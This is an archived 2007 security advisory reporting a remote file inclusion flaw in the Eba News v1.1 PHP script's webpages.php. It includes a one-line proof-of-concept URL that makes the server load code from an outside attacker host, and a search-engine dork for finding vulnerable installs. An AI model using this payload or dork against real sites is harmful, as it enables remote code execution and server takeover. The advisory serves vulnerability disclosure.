TUCoPS :: HP Unsorted E

TUCoPS :: HP Unsorted E :: tb10544.htm
Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org

Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org


--------------------------------------------------
Eba News Version : v1.1 <=  (webpages.php) Remote File Include 
--------------------------------------------------

Author		: SekoMirza
Date Found	: Nisan 11 2007
Location	: Fransa // ... 
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: Eba News
version		: 1.1
vendor		: http://ebascripts.com/ 
source url : http://ebascripts.com/ 
--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.

 

--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in admin/public/webpages.php


Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=http://attact.com/colok.txt? 

--------------------------------------------------

google d0rk:
~~~~~~~
"Eba News"

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL 

--------------------------------------------------
Shoutz:
~~
~ My  Sweet       -> Caramel 
~ For Mp3s        -> Hypn0sis
~ For Support -> www.starhack.org 
~ My  Bro         -> PhantomOrchid
~ My  Preceptor   -> Earnk Kazno
 

--------------------------------------------------

Contact:
~~~
 
     Seko[at]se-ko[dot]info
     
-------------------------------- [ EOF ]----------